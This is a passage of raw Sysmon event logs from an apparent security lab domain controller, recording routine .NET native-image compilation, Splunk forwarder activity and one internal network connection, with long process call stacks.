21:03:54.612{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BA-60D3-7403-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.596{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1BA-60D3-7403-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.596{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BA-60D3-7403-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.549{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BA-60D3-7303-00000000CF01}5688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.518{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BA-60D3-7303-00000000CF01}5688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.518{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BA-60D3-7303-00000000CF01}5688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:54.503{4DB9351A-A1BA-60D3-7203-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11e8-0\Microsoft.InternationalSettings.Commands.dll2021-06-23 21:03:54.503 10341000x800000000000000020378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.440{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BA-60D3-7203-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.424{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BA-60D3-7203-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.424{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BA-60D3-7203-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.362{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BA-60D3-7103-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.346{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BA-60D3-7103-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.346{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BA-60D3-7103-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:54.268{4DB9351A-A1B9-60D3-6F03-00000000CF01}4376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1118-0\Microsoft.Internal.Tasks.Dataflow.dll2021-06-23 21:03:54.268 10341000x800000000000000020371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.159{4DB9351A-A1B9-60D3-7003-00000000CF01}59364952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.003{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82F3965AAD0D45954FA174725C29A727,SHA256=FA58ADA2CF26BD826F2A5CD389F126DDAAEF19B7005C7DA75F294ABE10E07A99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.973{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BB-60D3-7903-00000000CF01}5720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.958{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1BB-60D3-7903-00000000CF01}5720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.958{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BB-60D3-7903-00000000CF01}5720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:55.895{4DB9351A-A1BB-60D3-7703-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1278-0\Microsoft.Isam.Esent.Interop.Wsa.dll2021-06-23 21:03:55.895 10341000x800000000000000020414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.864{4DB9351A-A1BB-60D3-7803-00000000CF01}65007104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000020413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.166{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61420-false10.0.1.12-8000- 10341000x800000000000000020412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1BB-60D3-7803-00000000CF01}6500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BB-60D3-7803-00000000CF01}6500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1BB-60D3-7803-00000000CF01}6500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 